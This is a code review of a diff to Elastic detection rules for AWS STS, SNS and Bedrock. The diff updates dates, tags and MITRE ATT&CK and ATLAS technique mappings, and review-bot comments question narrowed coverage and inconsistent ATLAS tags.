-name = "Application Access Token"
-reference = "https://attack.mitre.org/techniques/T1550/001/"
-
-
-
-[rule.threat.tactic]
-id = "TA0008"
-name = "Lateral Movement"
-reference = "https://attack.mitre.org/tactics/TA0008/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
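Review bot: The `T1550.001`/Lateral Movement entry is dropped from this rule and the tags hunk above removes `Tactic: Lateral Movement`, but neither the commit subject ("update tag & tacit unit test") nor anything in the hunk records why coverage was narrowed. The same narrowing appears in the `role_assumption_by_user` hunk (L193), the `sts_assume_root` hunk (L194, Persistence/`T1098.003` removed), `sts_role_chaining` (L196, Lateral Movement removed) and the SNS rule (L198, Resource Development removed). Because MITRE coverage reports and downstream consumers key on these mappings, a short list of the removed mappings and the rationale in the PR description would make the change reviewable; the tags and `[[rule.threat]]` blocks themselves are consistent with each other in every one of these hunks.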
diff --git a/rules/integrations/aws/privilege_escalation_role_assumption_by_user.toml b/rules/integrations/aws/privilege_escalation_role_assumption_by_user.toml
index 0abf5a097d8..cd0e19ac332 100644
--- a/rules/integrations/aws/privilege_escalation_role_assumption_by_user.toml
+++ b/rules/integrations/aws/privilege_escalation_role_assumption_by_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/11/05"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/02/27"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -71,16 +71,7 @@ references = ["https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRol
 risk_score = 21
 rule_id = "288a198e-9b9b-11ef-a0a8-f661ea17fbcd"
 severity = "low"
-tags = [
- "Domain: Cloud",
- "Data Source: AWS",
- "Data Source: Amazon Web Services",
- "Data Source: AWS STS",
- "Resources: Investigation Guide",
- "Use Case: Identity and Access Audit",
- "Tactic: Privilege Escalation",
- "Tactic: Lateral Movement",
-]
+tags = ["Domain: Cloud", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS STS", "Resources: Investigation Guide", "Use Case: Identity and Access Audit"]
 timestamp_override = "event.ingested"
 type = "new_terms"
@@ -95,34 +86,21 @@ event.dataset: "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1548"
 name = "Abuse Elevation Control Mechanism"
 reference = "https://attack.mitre.org/techniques/T1548/"
+[[rule.threat.technique.subtechnique]]
+id = "T1548.005"
+name = "Temporary Elevated Cloud Access"
+reference = "https://attack.mitre.org/techniques/T1548/005/"
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1550"
-name = "Use Alternate Authentication Material"
-reference = "https://attack.mitre.org/techniques/T1550/"
-[[rule.threat.technique.subtechnique]]
-id = "T1550.001"
-name = "Application Access Token"
-reference = "https://attack.mitre.org/techniques/T1550/001/"
-
-
-
-[rule.threat.tactic]
-id = "TA0008"
-name = "Lateral Movement"
-reference = "https://attack.mitre.org/tactics/TA0008/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/privilege_escalation_sts_assume_root_from_rare_user_and_member_account.toml b/rules/integrations/aws/privilege_escalation_sts_assume_root_from_rare_user_and_member_account.toml
index 49cbe18daaf..ce86a7ec2d3 100644
--- a/rules/integrations/aws/privilege_escalation_sts_assume_root_from_rare_user_and_member_account.toml
+++ b/rules/integrations/aws/privilege_escalation_sts_assume_root_from_rare_user_and_member_account.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/11/24"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/16"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -161,39 +161,21 @@ event.dataset: "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1548"
 name = "Abuse Elevation Control Mechanism"
 reference = "https://attack.mitre.org/techniques/T1548/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1548.005"
 name = "Temporary Elevated Cloud Access"
 reference = "https://attack.mitre.org/techniques/T1548/005/"
-
-
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
-[[rule.threat.technique.subtechnique]]
-id = "T1098.003"
-name = "Additional Cloud Roles"
-reference = "https://attack.mitre.org/techniques/T1098/003/"
-
-
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/privilege_escalation_sts_role_chaining.toml b/rules/integrations/aws/privilege_escalation_sts_role_chaining.toml
index 6e489d34aec..5d7bc1dd47b 100644
--- a/rules/integrations/aws/privilege_escalation_sts_role_chaining.toml
+++ b/rules/integrations/aws/privilege_escalation_sts_role_chaining.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/10/23"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/16"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
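Review bot: This file's diff consists only of the `updated_date` bump and this threat hunk, and the hunk removes the whole Persistence/`T1098.003` entry without a matching tags hunk. If the rule's `tags` array (outside this hunk) still carries `Tactic: Persistence`, that tag is now orphaned relative to `[[rule.threat]]` and a tag/tactic consistency check would flag it; if the tag was never there, nothing to do. Worth a quick look at the untouched `tags` line before merge.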
@@ -89,17 +89,7 @@ references = [
 risk_score = 47
 rule_id = "ba5a0b0c-b477-4729-a3dc-0147c2049cf1"
 severity = "medium"
-tags = [
- "Domain: Cloud",
- "Data Source: AWS",
- "Data Source: Amazon Web Services",
- "Data Source: AWS STS",
- "Use Case: Threat Detection",
- "Tactic: Persistence",
- "Tactic: Privilege Escalation",
- "Tactic: Lateral Movement",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS STS", "Use Case: Threat Detection", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "new_terms"
@@ -134,41 +124,39 @@ field_names = [
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1548"
-name = "Abuse Elevation Control Mechanism"
-reference = "https://attack.mitre.org/techniques/T1548/"
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+[[rule.threat.technique.subtechnique]]
+id = "T1078.004"
+name = "Cloud Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/004/"
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1550"
-name = "Use Alternate Authentication Material"
-reference = "https://attack.mitre.org/techniques/T1550/"
-[[rule.threat.technique.subtechnique]]
-id = "T1550.001"
-name = "Application Access Token"
-reference = "https://attack.mitre.org/techniques/T1550/001/"
-
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
-[rule.threat.tactic]
-id = "TA0008"
-name = "Lateral Movement"
-reference = "https://attack.mitre.org/tactics/TA0008/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
+[[rule.threat.technique.subtechnique]]
+id = "T1078.004"
+name = "Cloud Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/004/"
 [rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
-
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["aws.cloudtrail.user_identity.session_context.session_issuer.arn", "aws.cloudtrail.resources.arn"]
diff --git a/rules/integrations/aws/resource_development_sns_topic_created_by_rare_user.toml b/rules/integrations/aws/resource_development_sns_topic_created_by_rare_user.toml
index 275e3f821a8..d4dcde5af1c 100644
--- a/rules/integrations/aws/resource_development_sns_topic_created_by_rare_user.toml
+++ b/rules/integrations/aws/resource_development_sns_topic_created_by_rare_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/11"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/16"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -79,16 +79,7 @@ references = [
 risk_score = 21
 rule_id = "3c3f65b8-e8b4-11ef-9511-f661ea17fbce"
 severity = "low"
-tags = [
- "Domain: Cloud",
- "Data Source: AWS",
- "Data Source: Amazon Web Services",
- "Data Source: AWS SNS",
- "Resources: Investigation Guide",
- "Use Case: Threat Detection",
- "Tactic: Resource Development",
- "Tactic: Impact",
-]
+tags = ["Domain: Cloud", "Tactic: Impact", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS SNS", "Resources: Investigation Guide", "Use Case: Threat Detection"]
 timestamp_override = "event.ingested"
 type = "new_terms"
@@ -102,33 +93,21 @@ event.dataset: "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1608"
-name = "Stage Capabilities"
-reference = "https://attack.mitre.org/techniques/T1608/"
-
-[rule.threat.tactic]
-id = "TA0042"
-name = "Resource Development"
-reference = "https://attack.mitre.org/tactics/TA0042/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1496"
 name = "Resource Hijacking"
 reference = "https://attack.mitre.org/techniques/T1496/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1496.004"
 name = "Cloud Service Hijacking"
 reference = "https://attack.mitre.org/techniques/T1496/004/"
-
 [rule.threat.tactic]
 id = "TA0040"
 name = "Impact"
 reference = "https://attack.mitre.org/tactics/TA0040/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws_bedrock/aws_bedrock_execution_without_guardrails.toml b/rules/integrations/aws_bedrock/aws_bedrock_execution_without_guardrails.toml
index a500a627229..342420cbf1c 100644
--- a/rules/integrations/aws_bedrock/aws_bedrock_execution_without_guardrails.toml
+++ b/rules/integrations/aws_bedrock/aws_bedrock_execution_without_guardrails.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/11/25"
 integration = ["aws_bedrock"]
 maturity = "production"
-updated_date = "2025/09/25"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -67,15 +67,7 @@ This rule requires that guardrails are configured in AWS Bedrock. For more infor
 https://docs.aws.amazon.com/bedrock/latest/userguide/guardrails-create.html
 """
 severity = "medium"
-tags = [
- "Domain: LLM",
- "Data Source: AWS Bedrock",
- "Data Source: AWS S3",
- "Resources: Investigation Guide",
- "Use Case: Policy Violation",
- "Mitre Atlas: T0051",
- "Mitre Atlas: T0054",
-]
+tags = ["Domain: LLM", "Tactic: Defense Evasion", "Tactic: AI Model Access", "Data Source: AWS Bedrock", "Data Source: AWS S3", "Resources: Investigation Guide", "Use Case: Policy Violation", "Mitre Atlas: T0051", "Mitre Atlas: T0054"]
 timestamp_override = "event.ingested"
 type = "esql"
@@ -107,3 +99,41 @@ from logs-aws_bedrock.invocation-*
 | sort Esql.ml_invocations_no_guardrails_count desc
 '''
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1562"
+name = "Impair Defenses"
+reference = "https://attack.mitre.org/techniques/T1562/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATLAS"
+
+[[rule.threat.technique]]
+id = "AML.T0040"
+name = "AI Model Inference API Access"
+reference = "https://atlas.mitre.org/techniques/AML.T0040/"
+
+[rule.threat.tactic]
+id = "AML.T0000"
+name = "AI Model Access"
+reference = "https://atlas.mitre.org/tactics/AML.TA0000/"
+
+[[rule.threat]]
+framework = "MITRE ATLAS"
+
+[[rule.threat.technique]]
+id = "AML.T0094"
+name = "Delay Execution of LLM Instructions"
+reference = "https://atlas.mitre.org/techniques/AML.T0094/"
+
+[rule.threat.tactic]
+id = "AML.TA0007"
+name = "Defense Evasion"
+reference = "https://atlas.mitre.org/tactics/AML.TA0007/"
diff --git a/rules/integrations/aws_bedrock/aws_bedrock_guardrails_multiple_violations_by_single_user.toml b/rules/integrations/aws_bedrock/aws_bedrock_guardrails_multiple_violations_by_single_user.toml
index b4749c143ba..2f835ffd183 100644
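Review bot: The tags hunk keeps the legacy `Mitre Atlas: T0051` and `Mitre Atlas: T0054` entries while the new `[[rule.threat]]` blocks map the rule to `AML.T0040` and `AML.T0094`, so the file now states two different ATLAS technique sets. The same split is present in the other Bedrock rules on this page (L200, L201, L205, L206, L207, L208, L209), and L203 keeps `Mitre Atlas: LLM04`, which is not an `AML.T…`-style ATLAS id at all. Now that structured ATLAS entries exist, either bring the legacy tags in line with the technique ids used in `[[rule.threat]]` or drop them, so coverage tooling and readers see a single mapping per rule.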
--- a/rules/integrations/aws_bedrock/aws_bedrock_guardrails_multiple_violations_by_single_user.toml
+++ b/rules/integrations/aws_bedrock/aws_bedrock_guardrails_multiple_violations_by_single_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/05/02"
 integration = ["aws_bedrock"]
 maturity = "production"
-updated_date = "2025/09/25"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -68,15 +68,7 @@ This rule requires that guardrails are configured in AWS Bedrock. For more infor
 https://docs.aws.amazon.com/bedrock/latest/userguide/guardrails-create.html
 """
 severity = "medium"
-tags = [
- "Domain: LLM",
- "Data Source: AWS Bedrock",
- "Data Source: AWS S3",
- "Resources: Investigation Guide",
- "Use Case: Policy Violation",
- "Mitre Atlas: T0051",
- "Mitre Atlas: T0054",
-]
+tags = ["Domain: LLM", "Tactic: Defense Evasion", "Data Source: AWS Bedrock", "Data Source: AWS S3", "Resources: Investigation Guide", "Use Case: Policy Violation", "Mitre Atlas: T0051", "Mitre Atlas: T0054"]
 timestamp_override = "event.ingested"
 type = "esql"
@@ -107,3 +99,15 @@ from logs-aws_bedrock.invocation-*
 | sort Esql.ml_violations_count desc
 '''
+[[rule.threat]]
+framework = "MITRE ATLAS"
+
+[[rule.threat.technique]]
+id = "AML.T0015"
+name = "Evade AI Model"
+reference = "https://atlas.mitre.org/techniques/AML.T0015/"
+
+[rule.threat.tactic]
+id = "AML.TA0007"
+name = "Defense Evasion"
+reference = "https://atlas.mitre.org/tactics/AML.TA0007/"
diff --git a/rules/integrations/aws_bedrock/aws_bedrock_guardrails_multiple_violations_in_single_request.toml b/rules/integrations/aws_bedrock/aws_bedrock_guardrails_multiple_violations_in_single_request.toml
index 1ea547c91c7..cccd06e4041 100644
--- a/rules/integrations/aws_bedrock/aws_bedrock_guardrails_multiple_violations_in_single_request.toml
+++ b/rules/integrations/aws_bedrock/aws_bedrock_guardrails_multiple_violations_in_single_request.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/05/02"
 integration = ["aws_bedrock"]
 maturity = "production"
-updated_date = "2025/11/10"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -68,15 +68,7 @@ This rule requires that guardrails are configured in AWS Bedrock. For more infor
 https://docs.aws.amazon.com/bedrock/latest/userguide/guardrails-create.html
 """
 severity = "low"
-tags = [
- "Domain: LLM",
- "Data Source: AWS Bedrock",
- "Data Source: AWS S3",
- "Resources: Investigation Guide",
- "Use Case: Policy Violation",
- "Mitre Atlas: T0051",
- "Mitre Atlas: T0054",
-]
+tags = ["Domain: LLM", "Tactic: Defense Evasion", "Data Source: AWS Bedrock", "Data Source: AWS S3", "Resources: Investigation Guide", "Use Case: Policy Violation", "Mitre Atlas: T0051", "Mitre Atlas: T0054"]
 timestamp_override = "event.ingested"
 type = "esql"
@@ -116,3 +108,15 @@ from logs-aws_bedrock.invocation-*
 | sort Esql.ml_policy_violations_total_unique_requests_count desc
 '''
+[[rule.threat]]
+framework = "MITRE ATLAS"
+
+[[rule.threat.technique]]
+id = "AML.T0015"
+name = "Evade AI Model"
+reference = "https://atlas.mitre.org/techniques/AML.T0015/"
+
+[rule.threat.tactic]
+id = "AML.TA0007"
+name = "Defense Evasion"
+reference = "https://atlas.mitre.org/tactics/AML.TA0007/"
diff --git a/rules/integrations/aws_bedrock/aws_bedrock_high_confidence_misconduct_blocks_detected.toml b/rules/integrations/aws_bedrock/aws_bedrock_high_confidence_misconduct_blocks_detected.toml
index f2706780c70..e69765cf766 100644
--- a/rules/integrations/aws_bedrock/aws_bedrock_high_confidence_misconduct_blocks_detected.toml
+++ b/rules/integrations/aws_bedrock/aws_bedrock_high_confidence_misconduct_blocks_detected.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/05/05"
 integration = ["aws_bedrock"]
 maturity = "production"
-updated_date = "2025/11/10"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -67,15 +67,7 @@ This rule requires that guardrails are configured in AWS Bedrock. For more infor
 https://docs.aws.amazon.com/bedrock/latest/userguide/guardrails-create.html
 """
 severity = "medium"
-tags = [
- "Domain: LLM",
- "Data Source: AWS Bedrock",
- "Data Source: AWS S3",
- "Use Case: Policy Violation",
- "Mitre Atlas: T0051",
- "Mitre Atlas: T0054",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: LLM", "Tactic: Execution", "Data Source: AWS Bedrock", "Data Source: AWS S3", "Use Case: Policy Violation", "Mitre Atlas: T0051", "Mitre Atlas: T0054", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "esql"
@@ -120,3 +112,15 @@ from logs-aws_bedrock.invocation-*
 | sort Esql.ml_policy_blocked_violation_total_count desc
 '''
+[[rule.threat]]
+framework = "MITRE ATLAS"
+
+[[rule.threat.technique]]
+id = "AML.T0051"
+name = "LLM Prompt Injection"
+reference = "https://atlas.mitre.org/techniques/AML.T0051/"
+
+[rule.threat.tactic]
+id = "AML.TA0005"
+name = "Execution"
+reference = "https://atlas.mitre.org/tactics/AML.TA0005/"
diff --git a/rules/integrations/aws_bedrock/aws_bedrock_high_resource_consumption_detection.toml b/rules/integrations/aws_bedrock/aws_bedrock_high_resource_consumption_detection.toml
index 6a2358b50ba..f8addb7be34 100644
--- a/rules/integrations/aws_bedrock/aws_bedrock_high_resource_consumption_detection.toml
+++ b/rules/integrations/aws_bedrock/aws_bedrock_high_resource_consumption_detection.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/05/04"
 integration = ["aws_bedrock"]
 maturity = "production"
-updated_date = "2025/09/25"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -66,16 +66,7 @@ This rule requires that guardrails are configured in AWS Bedrock. For more infor
 https://docs.aws.amazon.com/bedrock/latest/userguide/guardrails-create.html
 """
 severity = "medium"
-tags = [
- "Domain: LLM",
- "Data Source: AWS Bedrock",
- "Data Source: Amazon Web Services",
- "Data Source: AWS S3",
- "Use Case: Potential Overload",
- "Use Case: Resource Exhaustion",
- "Mitre Atlas: LLM04",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: LLM", "Tactic: Exfiltration", "Tactic: Impact", "Tactic: AI Model Access", "Data Source: AWS Bedrock", "Data Source: Amazon Web Services", "Data Source: AWS S3", "Use Case: Potential Overload", "Use Case: Resource Exhaustion", "Mitre Atlas: LLM04", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "esql"
@@ -115,3 +106,72 @@ from logs-aws_bedrock.invocation-*
 | sort Esql.ml_risk_score desc
 '''
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1020"
+name = "Automated Exfiltration"
+reference = "https://attack.mitre.org/techniques/T1020/"
+
+[rule.threat.tactic]
+id = "TA0010"
+name = "Exfiltration"
+reference = "https://attack.mitre.org/tactics/TA0010/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1499"
+name = "Endpoint Denial of Service"
+reference = "https://attack.mitre.org/techniques/T1499/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1499.003"
+name = "Application Exhaustion Flood"
+reference = "https://attack.mitre.org/techniques/T1499/003/"
+
+[rule.threat.tactic]
+id = "TA0040"
+name = "Impact"
+reference = "https://attack.mitre.org/tactics/TA0040/"
+
+[[rule.threat]]
+framework = "MITRE ATLAS"
+
+[[rule.threat.technique]]
+id = "AML.T0040"
+name = "AI Model Inference API Access"
+reference = "https://atlas.mitre.org/techniques/AML.T0040/"
+
+[rule.threat.tactic]
+id = "AML.TA0000"
+name = "AI Model Access"
+reference = "https://atlas.mitre.org/tactics/AML.TA0000/"
+
+[[rule.threat]]
+framework = "MITRE ATLAS"
+
+[[rule.threat.technique]]
+id = "AML.T0024"
+name = "Exfiltration via AI Inference API"
+reference = "https://atlas.mitre.org/techniques/AML.T0024/"
+
+[rule.threat.tactic]
+id = "AML.TA0010"
+name = "Exfiltration"
+reference = "https://atlas.mitre.org/tactics/AML.TA0010/"
+
+[[rule.threat]]
+framework = "MITRE ATLAS"
+
+[[rule.threat.technique]]
+id = "AML.T0046"
+name = "Spamming AI System with Chaff Data"
+reference = "https://atlas.mitre.org/techniques/AML.T0046/"
+
+[rule.threat.tactic]
+id = "AML.TA0011"
+name = "Impact"
+reference = "https://atlas.mitre.org/tactics/AML.TA0011/"
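Review bot: The ATT&CK `T1020` "Automated Exfiltration" entry for a high-resource-consumption detector is not self-evident from the rule's subject; the ATLAS `AML.T0024` and `AML.T0046` entries further down the hunk read as the intended mappings, with `T1020` and `T1499.003` as ATT&CK counterparts. If that mirroring is the intent, a sentence in the rule's description (outside this hunk) or in the PR saying that the ATT&CK tactics mirror the ATLAS ones would keep coverage reports from being read as claiming genuine exfiltration detection. The tags hunk above (`Tactic: Exfiltration`, `Tactic: Impact`, `Tactic: AI Model Access`) does line up with the five tactic blocks added here.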
diff --git a/rules/integrations/aws_bedrock/aws_bedrock_multiple_attempts_to_use_denied_models_by_user.toml b/rules/integrations/aws_bedrock/aws_bedrock_multiple_attempts_to_use_denied_models_by_user.toml
index ac6eb38eb16..bb89d860f1b 100644
--- a/rules/integrations/aws_bedrock/aws_bedrock_multiple_attempts_to_use_denied_models_by_user.toml
+++ b/rules/integrations/aws_bedrock/aws_bedrock_multiple_attempts_to_use_denied_models_by_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/05/02"
 integration = ["aws_bedrock"]
 maturity = "production"
-updated_date = "2025/09/25"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -64,15 +64,7 @@ This rule requires that guardrails are configured in AWS Bedrock. For more infor
 https://docs.aws.amazon.com/bedrock/latest/userguide/guardrails-create.html
 """
 severity = "high"
-tags = [
- "Domain: LLM",
- "Data Source: AWS Bedrock",
- "Data Source: AWS S3",
- "Resources: Investigation Guide",
- "Use Case: Policy Violation",
- "Mitre Atlas: T0015",
- "Mitre Atlas: T0034",
-]
+tags = ["Domain: LLM", "Tactic: AI Model Access", "Data Source: AWS Bedrock", "Data Source: AWS S3", "Resources: Investigation Guide", "Use Case: Policy Violation", "Mitre Atlas: T0015", "Mitre Atlas: T0034"]
 timestamp_override = "event.ingested"
 type = "esql"
@@ -109,3 +101,15 @@ from logs-aws_bedrock.invocation-*
 [rule.investigation_fields]
 field_names = ["user.id", "cloud.account.id", "gen_ai.request.model.id", "total_denials"]
+[[rule.threat]]
+framework = "MITRE ATLAS"
+
+[[rule.threat.technique]]
+id = "AML.T0040"
+name = "AI Model Inference API Access"
+reference = "https://atlas.mitre.org/techniques/AML.T0040/"
+
+[rule.threat.tactic]
+id = "AML.TA0000"
+name = "AI Model Access"
+reference = "https://atlas.mitre.org/tactics/AML.TA0000/"
diff --git a/rules/integrations/aws_bedrock/aws_bedrock_multiple_sensitive_information_policy_blocks_detected.toml b/rules/integrations/aws_bedrock/aws_bedrock_multiple_sensitive_information_policy_blocks_detected.toml
index 2e665685b4f..b5824163b1e 100644
--- a/rules/integrations/aws_bedrock/aws_bedrock_multiple_sensitive_information_policy_blocks_detected.toml
+++ b/rules/integrations/aws_bedrock/aws_bedrock_multiple_sensitive_information_policy_blocks_detected.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/11/20"
 integration = ["aws_bedrock"]
 maturity = "production"
-updated_date = "2025/11/10"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -66,15 +66,7 @@ This rule requires that guardrails are configured in AWS Bedrock. For more infor
 https://docs.aws.amazon.com/bedrock/latest/userguide/guardrails-create.html
 """
 severity = "medium"
-tags = [
- "Domain: LLM",
- "Data Source: AWS Bedrock",
- "Data Source: AWS S3",
- "Use Case: Policy Violation",
- "Mitre Atlas: T0051",
- "Mitre Atlas: T0054",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: LLM", "Tactic: Discovery", "Data Source: AWS Bedrock", "Data Source: AWS S3", "Use Case: Policy Violation", "Mitre Atlas: T0051", "Mitre Atlas: T0054", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "esql"
@@ -106,3 +98,15 @@ from logs-aws_bedrock.invocation-*
 | sort Esql.ml_policy_blocked_sensitive_info_count desc
 '''
+[[rule.threat]]
+framework = "MITRE ATLAS"
+
+[[rule.threat.technique]]
+id = "AML.T0089"
+name = "Process Discovery"
+reference = "https://atlas.mitre.org/techniques/AML.T0089/"
+
+[rule.threat.tactic]
+id = "AML.TA0008"
+name = "Discovery"
+reference = "https://atlas.mitre.org/tactics/AML.TA0008/"
diff --git a/rules/integrations/aws_bedrock/aws_bedrock_multiple_topic_policy_blocks_detected.toml b/rules/integrations/aws_bedrock/aws_bedrock_multiple_topic_policy_blocks_detected.toml
index c98ff4ef1f5..c2a53901fee 100644
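Review bot: Mapping sensitive-information policy blocks to `AML.T0089` "Process Discovery" under Discovery is not evident from the rule's subject, and the word-policy (profanity) rule at L209 maps to `AML.T0084` "Discover AI Agent Configuration" plus the same `AML.T0089`. If the reasoning is that repeated guardrail hits indicate probing of the model's restrictions, say so in the PR description, or in the rule's description outside this hunk, so the Discovery tactic is defensible when these rules are audited. The topic-policy rule at L207 (`AML.T0069` "Discover LLM System Information") reads more naturally and needs no such note.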
--- a/rules/integrations/aws_bedrock/aws_bedrock_multiple_topic_policy_blocks_detected.toml
+++ b/rules/integrations/aws_bedrock/aws_bedrock_multiple_topic_policy_blocks_detected.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/11/20"
 integration = ["aws_bedrock"]
 maturity = "production"
-updated_date = "2025/11/10"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -66,15 +66,7 @@ This rule requires that guardrails are configured in AWS Bedrock. For more infor
 https://docs.aws.amazon.com/bedrock/latest/userguide/guardrails-create.html
 """
 severity = "medium"
-tags = [
- "Domain: LLM",
- "Data Source: AWS Bedrock",
- "Data Source: AWS S3",
- "Use Case: Policy Violation",
- "Mitre Atlas: T0051",
- "Mitre Atlas: T0054",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: LLM", "Tactic: Discovery", "Data Source: AWS Bedrock", "Data Source: AWS S3", "Use Case: Policy Violation", "Mitre Atlas: T0051", "Mitre Atlas: T0054", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "esql"
@@ -106,3 +98,15 @@ from logs-aws_bedrock.invocation-*
 | sort Esql.ml_policy_blocked_topic_count desc
 '''
+[[rule.threat]]
+framework = "MITRE ATLAS"
+
+[[rule.threat.technique]]
+id = "AML.T0069"
+name = "Discover LLM System Information"
+reference = "https://atlas.mitre.org/techniques/AML.T0069/"
+
+[rule.threat.tactic]
+id = "AML.TA0008"
+name = "Discovery"
+reference = "https://atlas.mitre.org/tactics/AML.TA0008/"
diff --git a/rules/integrations/aws_bedrock/aws_bedrock_multiple_validation_exception_errors_by_single_user.toml b/rules/integrations/aws_bedrock/aws_bedrock_multiple_validation_exception_errors_by_single_user.toml
index 360900d81b5..19935aec2b5 100644
--- a/rules/integrations/aws_bedrock/aws_bedrock_multiple_validation_exception_errors_by_single_user.toml
+++ b/rules/integrations/aws_bedrock/aws_bedrock_multiple_validation_exception_errors_by_single_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/09/11"
 integration = ["aws_bedrock"]
 maturity = "production"
-updated_date = "2025/07/16"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -67,17 +67,7 @@ This rule requires that AWS Bedrock Integration be configured. For more informat
 https://www.elastic.co/docs/current/integrations/aws_bedrock
 """
 severity = "high"
-tags = [
- "Domain: LLM",
- "Data Source: AWS",
- "Data Source: AWS Bedrock",
- "Data Source: AWS S3",
- "Use Case: Policy Violation",
- "Mitre Atlas: T0015",
- "Mitre Atlas: T0034",
- "Mitre Atlas: T0046",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: LLM", "Tactic: AI Model Access", "Data Source: AWS", "Data Source: AWS Bedrock", "Data Source: AWS S3", "Use Case: Policy Violation", "Mitre Atlas: T0015", "Mitre Atlas: T0034", "Mitre Atlas: T0046", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "esql"
@@ -115,3 +105,15 @@ from logs-aws_bedrock.invocation-*
 [rule.investigation_fields]
 field_names = ["target_time_window", "user.id", "cloud.account.id", "total_denials"]
